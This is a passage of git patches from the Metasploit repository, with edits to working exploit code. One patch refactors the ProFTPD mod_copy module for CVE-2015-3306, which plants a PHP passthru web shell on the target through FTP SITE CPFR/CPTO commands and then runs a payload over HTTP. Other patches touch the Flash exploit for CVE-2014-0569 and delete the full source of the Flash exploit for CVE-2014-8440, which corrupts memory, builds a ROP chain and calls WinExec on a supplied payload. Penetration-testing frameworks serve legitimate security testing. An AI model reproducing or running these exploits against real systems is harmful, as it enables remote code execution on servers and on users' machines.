+++ b/external/source/exploits/CVE-2014-0569/Exploit.as
@@ -66,7 +66,7 @@ package
 			try {
 				var uint_vector_pos:uint = search_uint_vector()
 			} catch (err:Error) {
-				Logger.log("Vector.<uint> not found :(")
+				Logger.log("[!] Exploit - Corrupted Vector.<uint> not found")
 				return
 			}
 			
@@ -76,7 +76,7 @@ package
 			for (i = 0; i < ov.length; i++) {
 				if (ov[i].length > 1024) {
 					uv = ov[i]
-					Logger.log("Vector.<uint> corrupted found :)")
+					Logger.log("[*] Exploit - Corrupted Vector.<uint> found")
 				} else {
 					ov[i] = null
 				}
diff --git a/external/source/exploits/CVE-2014-0569/Logger.as b/external/source/exploits/CVE-2014-0569/Logger.as
index 61ec768c25..16c0447973 100755
--- a/external/source/exploits/CVE-2014-0569/Logger.as
+++ b/external/source/exploits/CVE-2014-0569/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {

From 5bab1cfc68b2777e7b2353fc3293229e315db4c4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 12:38:24 -0500
Subject: [PATCH 0363/1013] Fix indentation

---
 .../source/exploits/CVE-2014-0569/Exploit.as  | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/external/source/exploits/CVE-2014-0569/Exploit.as b/external/source/exploits/CVE-2014-0569/Exploit.as
index f6a9fe5dcc..fd7da7115f 100755
--- a/external/source/exploits/CVE-2014-0569/Exploit.as
+++ b/external/source/exploits/CVE-2014-0569/Exploit.as
@@ -22,10 +22,10 @@ package
 		private var uv:Vector.<uint>
 		private var ba:ByteArray
 		private var b64:Base64Decoder = new Base64Decoder();
-        private var payload:ByteArray
-        private var platform:String
-        private var os:String
-        private var exploiter:Exploiter
+    private var payload:ByteArray
+    private var platform:String
+    private var os:String
+    private var exploiter:Exploiter
 		private var defrag:Vector.<Object> = new Vector.<Object>(100)
 		private var ov:Vector.<Object> = new Vector.<Object>(200)
 				
@@ -34,13 +34,13 @@ package
 			var i:uint = 0
 			var j:uint = 0
 			
-            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            os = LoaderInfo(this.root.loaderInfo).parameters.os
-            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-            var pattern:RegExp = / /g;
-            b64_payload = b64_payload.replace(pattern, "+")
-            b64.decode(b64_payload)
-            payload = b64.toByteArray()
+      platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+      os = LoaderInfo(this.root.loaderInfo).parameters.os
+      var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+      var pattern:RegExp = / /g;
+      b64_payload = b64_payload.replace(pattern, "+")
+      b64.decode(b64_payload)
+      payload = b64.toByteArray()
 
 			for (i = 0; i < defrag.length; i++) {
 				defrag[i] = new ByteArray()

From 4f1ee3fcdf186ba69d24a0b3cc165e26f7dca92c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 12:42:32 -0500
Subject: [PATCH 0364/1013] Really fix indentation

---
 .../source/exploits/CVE-2014-0569/Exploit.as  | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/external/source/exploits/CVE-2014-0569/Exploit.as b/external/source/exploits/CVE-2014-0569/Exploit.as
index fd7da7115f..49c4e20dfd 100755
--- a/external/source/exploits/CVE-2014-0569/Exploit.as
+++ b/external/source/exploits/CVE-2014-0569/Exploit.as
@@ -22,10 +22,10 @@ package
 		private var uv:Vector.<uint>
 		private var ba:ByteArray
 		private var b64:Base64Decoder = new Base64Decoder();
-    private var payload:ByteArray
-    private var platform:String
-    private var os:String
-    private var exploiter:Exploiter
+		private var payload:ByteArray
+		private var platform:String
+		private var os:String
+		private var exploiter:Exploiter
 		private var defrag:Vector.<Object> = new Vector.<Object>(100)
 		private var ov:Vector.<Object> = new Vector.<Object>(200)
 				
@@ -34,13 +34,13 @@ package
 			var i:uint = 0
 			var j:uint = 0
 			
-      platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-      os = LoaderInfo(this.root.loaderInfo).parameters.os
-      var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-      var pattern:RegExp = / /g;
-      b64_payload = b64_payload.replace(pattern, "+")
-      b64.decode(b64_payload)
-      payload = b64.toByteArray()
+			platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+			os = LoaderInfo(this.root.loaderInfo).parameters.os
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray()
 
 			for (i = 0; i < defrag.length; i++) {
 				defrag[i] = new ByteArray()

From 5ab882a8d4c2647a91e7424adb3c47cf02cf8591 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 9 Jun 2015 13:58:01 -0500
Subject: [PATCH 0365/1013] Clean up module

---
 .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 47 ++++++++++---------
 1 file changed, 24 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
index 8d803b2338..5fc7f62908 100644
--- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
+
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
@@ -30,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', '2015-3306'],
+          [ 'CVE', '2015-3306' ],
           [ 'EDB', '36742' ],
         ],
       'Privileged'     => false,
@@ -57,91 +58,91 @@ class Metasploit3 < Msf::Exploit::Remote
         OptPort.new('RPORT', [true, 'HTTP port', 80]),
         OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
         OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
+        OptString.new('TMPPATH', [true, 'Absolute writable/executable path', '/tmp']),
         OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
       ], self.class)
   end
 
   def check
     ftp_port = datastore['RPORT_FTP']
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
 
     if sock.nil?
-      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
     else
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /220/ )
+    unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
 
     sock.puts("SITE CPFR /etc/passwd\r\n")
     res = sock.get_once(-1,10)
-    if res and res =~ /350/
-      return Exploit::CheckCode::Vulnerable
+    if res && res.include?('350')
+      Exploit::CheckCode::Vulnerable
     else
-      return Exploit::CheckCode::Safe
+      Exploit::CheckCode::Safe
     end
   end
 
   def exploit
-
     ftp_port = datastore['RPORT_FTP']
     get_arg = rand_text_alphanumeric(5+rand(3))
     payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
 
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
 
     if sock.nil?
-      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
     else
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /220/ )
+    unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
 
-    print_status("#{rhost}:21 - Sending copy commands to FTP server")
+    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
 
     sock.puts("SITE CPFR /proc/self/cmdline\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /350/ )
+    unless res && res.include?('350')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
     end
 
-    sock.put("SITE CPTO /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /250/ )
+    unless res && res.include?('250')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
     end
 
-    sock.put("SITE CPFR /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /350/ )
+    unless res && res.include?('350')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
     end
 
     sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
     res = sock.get_once(-1,10)
-    unless ( res and res =~ /250/ )
+    unless res && res.include?('250')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
     end
 
     sock.close
 
     print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
-    res = send_request_cgi!({
+    res = send_request_cgi!(
       'uri' => normalize_uri(target_uri.path, payload_name),
       'method' => 'GET',
       'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
-    })
+    )
 
-    unless ( res and res.code == 200 )
-      fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload")
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
     end
-
   end
+
 end

From cc8650f98a5d859e7d620b4fa9cb91d0c321292b Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 9 Jun 2015 14:15:18 -0500
Subject: [PATCH 0366/1013] Fix TMPPATH description

---
 modules/exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
index 5fc7f62908..d1de793e32 100644
--- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -57,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         OptPort.new('RPORT', [true, 'HTTP port', 80]),
         OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
+        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
         OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
-        OptString.new('TMPPATH', [true, 'Absolute writable/executable path', '/tmp']),
         OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
       ], self.class)
   end

From 8a69704d3e1d8ea696ace38b396afe4224edd65a Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 9 Jun 2015 14:15:18 -0500
Subject: [PATCH 0367/1013] Fix up commas

---
 .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 26 +++++++++----------
 1 file changed, 13 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
index d1de793e32..af6965cfca 100644
--- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2015-3306' ],
-          [ 'EDB', '36742' ],
+          [ 'EDB', '36742' ]
         ],
       'Privileged'     => false,
       'Platform'       => [ 'unix' ],
@@ -43,12 +43,12 @@ class Metasploit3 < Msf::Exploit::Remote
           'Compat'      =>
             {
               'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic gawk bash python perl',
+              'RequiredCmd' => 'generic gawk bash python perl'
             }
         },
       'Targets'        =>
         [
-          [ 'ProFTPD 1.3.5', { } ],
+          [ 'ProFTPD 1.3.5', { } ]
         ],
       'DisclosureDate' => 'Apr 22 2015',
       'DefaultTarget' => 0))
@@ -57,9 +57,9 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         OptPort.new('RPORT', [true, 'HTTP port', 80]),
         OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
+        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
         OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
-        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
-        OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
+        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
       ], self.class)
   end
 
@@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
 
     sock.puts("SITE CPFR /etc/passwd\r\n")
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     if res && res.include?('350')
       Exploit::CheckCode::Vulnerable
     else
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
     end
 
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     unless res && res.include?('220')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
     end
@@ -108,25 +108,25 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
 
     sock.puts("SITE CPFR /proc/self/cmdline\r\n")
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     unless res && res.include?('350')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
     end
 
     sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     unless res && res.include?('250')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
     end
 
     sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     unless res && res.include?('350')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
     end
 
     sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
-    res = sock.get_once(-1,10)
+    res = sock.get_once(-1, 10)
     unless res && res.include?('250')
       fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
     end
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi!(
       'uri' => normalize_uri(target_uri.path, payload_name),
       'method' => 'GET',
-      'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
+      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
     )
 
     unless res && res.code == 200

From f4649cb3fbb735342fa67cb1b0d2b4bfbfb0314b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 9 Jun 2015 14:50:59 -0500
Subject: [PATCH 0368/1013] Delete old AS

---
 external/source/exploits/CVE-2014-8440/Msf.as | 505 ------------------
 1 file changed, 505 deletions(-)
 delete mode 100755 external/source/exploits/CVE-2014-8440/Msf.as

diff --git a/external/source/exploits/CVE-2014-8440/Msf.as b/external/source/exploits/CVE-2014-8440/Msf.as
deleted file mode 100755
index 4497389619..0000000000
--- a/external/source/exploits/CVE-2014-8440/Msf.as
+++ /dev/null
@@ -1,505 +0,0 @@
-// Build how to:
-// 1. Download the AIRSDK, and use its compiler.
-// 2. Download the Flex SDK (4.6)
-// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
-//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
-// 4. Build with: mxmlc -o msf.swf Main.as
-
-// It uses original code from @hdarwin89 for exploitation using ba's and vectors 
-
-package
-{
-    import flash.utils.*
-    import flash.display.*
-    import flash.system.*
-    import mx.utils.Base64Decoder
-
-	public final class Msf extends Sprite {
-		
-		private var shared_ba:ByteArray = null
-		
-		private var hole_ba:ByteArray = null;
-		private var confuse_length_ba:ByteArray = null;
-		private var fake_ba:ByteArray = null;
-		private var worker:Worker = null;
-		
-		private var byte_array_vector:Vector.<Object> = null;
-		private var byte_array_vector_length:int;
-		
-		private var object_vector:Vector.<Object> = null;
-		private var object_vector_length:uint;
-		
-		private var ba:ByteArray
-		private var uv:Vector.<uint>
-		private var corrupted_uv_index:uint = 0
-		private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
-		private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
-		
-		private var b64:Base64Decoder = new Base64Decoder();
-		private var payload:String = ""
-		
-		public function Msf()  {
-			this.object_vector_length = 5770 * 2
-			this.byte_array_vector_length = 510 * 2
-			
-			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-			var pattern:RegExp = / /g;
-			b64_payload = b64_payload.replace(pattern, "+")
-			b64.decode(b64_payload)
-			payload = b64.toByteArray().toString()
-                        
-			this.initialize_worker_and_ba()
-			if (!this.trigger())
-			{
-				return
-			}
-            
-			var index:uint = search_uint_vector(114, 0x40000000)
-			if (index == 0xffffffff) {
-				return
-			}
-			
-			this.uv = this.object_vector[this.corrupted_uv_index]
-			
-			// Use the corrupted Vector<uint> to search saved addresses
-			var object_vector_pos:uint = search_object_vector()
-			var byte_array_object:uint = this.uv[object_vector_pos] - 1
-			var main:uint = this.uv[object_vector_pos + 2] - 1
-			var stack_object:uint = this.uv[object_vector_pos + 3] - 1
-			var payload_space_object:uint = this.uv[object_vector_pos + 4] - 1
-			
-			// Locate the corrupted Vector<uint> in memory
-			// It allows arbitrary address memory read/write
-			var ba_address:uint = search_ba_address()
-			if (ba_address == 0xffffffff) {
-				return
-			}
-			var uv_address:uint = ba_address + index
-			this.uv[0] = uv_address
-			
-			// Use the corrupted Vector<uint> to disclose arbitrary memory
-			var buffer_object:uint = vector_read(byte_array_object + 0x40)
-			var buffer:uint = vector_read(buffer_object + 8)
-			var stack_address:uint = vector_read(stack_object + 0x18)
-			var payload_address:uint = vector_read(payload_space_object + 0x18)
-			var vtable:uint = vector_read(main)
-			
-			// Set the new ByteArray length
-			ba.endian = "littleEndian"
-			ba.length = 0x500000
-			
-			// Overwite the ByteArray data pointer and capacity
-			var ba_array:uint = buffer_object + 8
-			var ba_capacity:uint = buffer_object + 16
-			vector_write(ba_array)
-			vector_write(ba_capacity, 0xffffffff)
-			
-			// restoring the corrupted vector length since we don't need it
-			// anymore
-			this.uv[0] = 0xfeedbabe
-			//index = search_uint_vector(0xffffffff, 114)
-			index = search_uint_vector(0x40000000, 114)
-			if (index == 0xffffffff) {
-				return
-			}
-			
-			var flash:uint = base(vtable)
-			var winmm:uint = module("winmm.dll", flash)
-			var kernel32:uint = module("kernel32.dll", winmm)
-			var virtualprotect:uint = procedure("VirtualProtect", kernel32)
-			var winexec:uint = procedure("WinExec", kernel32)
-			var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
-			var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
-
-			// Continuation of execution
-			byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
-			byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
-			byte_write(0, "\x89\x03", false) // mov [ebx], eax
-			byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-
-			// Put the payload (command) in memory
-			byte_write(payload_address + 8, payload, true); // payload
-
-			// Put the fake vtabe / stack on memory
-			byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
-			byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
-			byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
-			byte_write(0, virtualprotect)
-
-			// VirtualProtect
-			byte_write(0, winexec)
-			byte_write(0, buffer + 0x10)
-			byte_write(0, 0x1000)
-			byte_write(0, 0x40)
-			byte_write(0, buffer + 0x8) // Writable address (4 bytes)
-
-			// WinExec
-			byte_write(0, buffer + 0x10)
-			byte_write(0, payload_address + 8)
-			byte_write(0)
-
-			byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
-						
-			toString() // call method in the fake vtable
-        }
-        
-        final private function initialize_worker_and_ba():Boolean{
-			this.ba = new ByteArray()
-			this.ba.endian = "littleEndian"
-			this.ba.length = 1024
-			this.ba.writeUnsignedInt(0xdeedbeef)
-			this.ba.position = 0
-			
-			this.shared_ba = new ByteArray()
-			this.shared_ba.shareable = true
-			this.shared_ba.endian = Endian.LITTLE_ENDIAN
-			this.shared_ba.writeUnsignedInt(252536)
-			this.shared_ba.writeUnsignedInt(16777216)
-
-			this.confuse_length_ba = new ByteArray()
-			this.confuse_length_ba.length = 0x2000
-			this.confuse_length_ba.endian = Endian.LITTLE_ENDIAN
-			this.fill_byte_array(this.confuse_length_ba, 0xAAAAAAAA)
-
-			this.fake_ba = new ByteArray();
-			this.fake_ba.endian = Endian.LITTLE_ENDIAN;
-
-			this.worker = WorkerDomain.current.createWorker(loaderInfo.bytes);
-			return true;
-        }
-
-        final private function trigger():Boolean{
-			// Memory massaging
-			// 1. Create ByteArray's of 0x2000 lenght and mark one of them (hole_ba)
-			this.fill_byte_array_vector();
-			// 2. Clear the marked ByteArray
-			this.hole_ba.clear(); 
-
-			// The shared_ba should be left in "shared" state
-			this.worker.setSharedProperty("fnfre", this.shared_ba)
-			this.worker.setSharedProperty("vfhrth", this.confuse_length_ba)
-			this.worker.setSharedProperty("vfhrth", this.shared_ba)
-
-			// fake_ba *data* is going to fill the space freed from the hole
-			this.fake_ba.length = 0x2000;
-			this.fill_byte_array(this.fake_ba, 0xBBBBBBBB);
-
-			// Trigger the vulnerability, if the memory layout is good enough 
-			// the (freed) hole_ba metadata will end being the shared_ba metadata...
-			this.shared_ba.uncompress()
-
-			// So its size should be 0x2000
-			if (this.shared_ba.length != 0x2000)
-			{
-				return false
-			}
-
-			// Free the fake_ba and make holes on the ByteArray's 
-			// allocated on massaging.
-			this.free_fake_and_make_holes()
-
-			// Fill the holes and the fake_ba data space with 
-			// <uint> vectors
-			this.fill_with_vectors()
-
-			// Hopefully the shared_ba metadata, product of the vulnerability
-			// at this moment point to the  <uint> vectors in memory =) it means
-			// game over.
-			var pwn_test:uint;
-			this.shared_ba.position = 0;
-			pwn_test = this.shared_ba.readUnsignedInt();
-
-			if (pwn_test == 0xBBBBBBBB)
-			{
-				return false
-			}
-
-			return true;
-        }
-        
-		final private function fill_byte_array(local_ba:ByteArray, value:int):void{
-			var i:int;
-			local_ba.position = 0;
-			i = 0;
-			while (i < (local_ba.length / 4))
-			{
-				local_ba.writeInt(value);
-				i++;
-			};
-			local_ba.position = 0;
-        }
-        
-        final private function fill_byte_array_vector():void{
-			var i:int;
-			var local_ba:ByteArray;
-			this.byte_array_vector = new Vector.<Object>(this.byte_array_vector_length)
-
-			i = 0;
-
-			while (i < this.byte_array_vector_length)
-			{
-				local_ba = new ByteArray();
-				this.byte_array_vector[i] = local_ba;
-				local_ba.endian = Endian.LITTLE_ENDIAN;
-				i++;
-			}
-
-			var hole_index:int = this.byte_array_vector_length * 4 / 5;
-			if (hole_index % 2 == 0)
-			{
-				hole_index++;
-			}
-
-			for(i = 0; i < this.byte_array_vector_length; i++)
-			{
-				local_ba =  this.byte_array_vector[i] as ByteArray
-				local_ba.length = 0x2000
-				this.fill_byte_array(local_ba, 0xCCCCCCCC)
-				local_ba.writeInt(0xbabefac0)
-				local_ba.writeInt(0xbabefac1)
-				local_ba.writeInt(i)
-				local_ba.writeInt(0xbabefac3)
-				if (i == hole_index)
-				{
-					this.hole_ba = local_ba;
-				}
-			}
-
-			return;
-		}
-        
-		final private function free_fake_and_make_holes():void {
-			var i:int
-			var clear_ba:ByteArray
-			var hole_index:int = this.byte_array_vector_length * 4 / 5
-
-			if (hole_index % 2 == 0)
-			{
-				hole_index++;
-		    }
-	
-		    for (i = 0; i < this.byte_array_vector_length; i++)
-			{
-				if (i == hole_index) {
-					this.fake_ba.clear();
-				} else {
-					if (i % 2 == 1)
-					{
-						clear_ba = this.byte_array_vector[i] as ByteArray
-						this.fill_byte_array(clear_ba, 0xDDDDDDDD)
-						clear_ba.clear()
-					}
-				}
-			}
-		    return
-		}
-        
-		final private function fill_with_vectors():void {
-			var i:uint;
-			var uint_vector:Vector.<uint>;
-			var objects:Vector.<Object>;
-			this.object_vector = new Vector.<Object>(this.object_vector_length);
-
-			i = 0
-			while (i < this.object_vector_length)
-			{
-				if (i % 2 == 0) {
-					this.object_vector[i] = new Vector.<uint>()
-				} else {
-					this.object_vector[i] = new Vector.<Object>()
-				}
-				i++
-			}
-
-			i = 0
-			while (i < this.object_vector_length)
-			{
-				if (i % 2 == 0) {
-					uint_vector = this.object_vector[i] as Vector.<uint>
-					uint_vector.length = 114
-					uint_vector[0] = 0xfeedbabe
-					uint_vector[1] = i
-					uint_vector[2] = 0xbabeface
-				} else {
-					objects = this.object_vector[i] as Vector.<Object>
-					objects.length = 114
-					objects[0] = this.ba
-					objects[1] = i
-					objects[2] = this
-					objects[3] = this.stack
-					objects[4] = this.payload_space
-				}
-				i++
-			}
-		}
-        
-		// Use the corrupted shared_ba to search and corrupt the uint vector
-		// Returns the offset to the *length* of the corrupted vector
-		private function search_uint_vector(old_length:uint, new_length:uint):uint {
-			this.shared_ba.position = 0
-			var i:uint = 0
-			var length:uint = 0
-			var atom:uint = 0
-			var mark_one:uint = 0
-			var index:uint = 0
-			var mark_two:uint = 0
-			while (i < 0x2000) {
-				length = shared_ba.readUnsignedInt()
-				if (length == old_length) {
-					atom = shared_ba.readUnsignedInt()
-					mark_one = shared_ba.readUnsignedInt()
-					index = shared_ba.readUnsignedInt()
-					mark_two = shared_ba.readUnsignedInt()
-					if (mark_one == 0xfeedbabe && mark_two == 0xbabeface) {
-						shared_ba.position = i
-						shared_ba.writeUnsignedInt(new_length)
-						this.corrupted_uv_index = index
-						return i;
-					}
-					i = i + 16
-				}
-				i = i + 4
-			}
-			return 0xffffffff
-		}
-		
-		// Use the corrupted shared_ba to disclose its own address
-		private function search_ba_address():uint {
-			var address:uint = 0
-			this.shared_ba.position = 0x14
-			address = shared_ba.readUnsignedInt()
-			if (address == 0) {
-				address = 0xffffffff
-				this.shared_ba.position = 8
-				var next:uint = shared_ba.readUnsignedInt()
-				var prior:uint = shared_ba.readUnsignedInt()
-				if (next - prior == 0x8000) {
-					address = prior + 0x4000
-				}
-			} else {
-				address = address - 0x30
-			}
-
-			return address
-		}
-		
-		// Use the corrupted uint vector to search an vector with
-		// interesting objects for info leaking
-		private function search_object_vector():uint {
-			var i:uint = 0;
-			while (i < 0x4000){
-				if (this.uv[i] == 114 && this.uv[i + 2] != 0xfeedbabe) {
-					return i + 1;
-				}
-				i++
-			}
-			return 0xffffffff
-		}
-		
-		// Methods to use the corrupted uint vector
-		
-		private function vector_write(addr:uint, value:uint = 0):void
-		{
-			var pos:uint = 0
-
-			if (addr > this.uv[0]) {
-				pos = ((addr - this.uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
-			}
-
-			this.uv[pos] = value
-		}
-
-		private function vector_read(addr:uint):uint
-		{
-			var pos:uint = 0
-
-			if (addr > this.uv[0]) {
-				pos = ((addr - this.uv[0]) / 4) - 2
-			} else {
-				pos = ((0xffffffff - (this.uv[0] - addr)) / 4) - 1
-			}
-
-			return this.uv[pos]
-		}
-		
-		// Methods to use the corrupted byte array for arbitrary reading/writing
-
-		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
-		{
-			if (addr) ba.position = addr
-			if (value is String) {
-				for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
-				if (zero) ba.writeByte(0)
-			} else ba.writeUnsignedInt(value)
-		}
-
-		private function byte_read(addr:uint, type:String = "dword"):uint
-		{
-			ba.position = addr
-			switch(type) {
-				case "dword":
-					return ba.readUnsignedInt()
-				case "word":
-					return ba.readUnsignedShort()
-				case "byte":
-					return ba.readUnsignedByte()
-			}
-			return 0
-		}
-
-		// Methods to search the memory with the corrupted byte array
-
-		private function base(addr:uint):uint
-		{
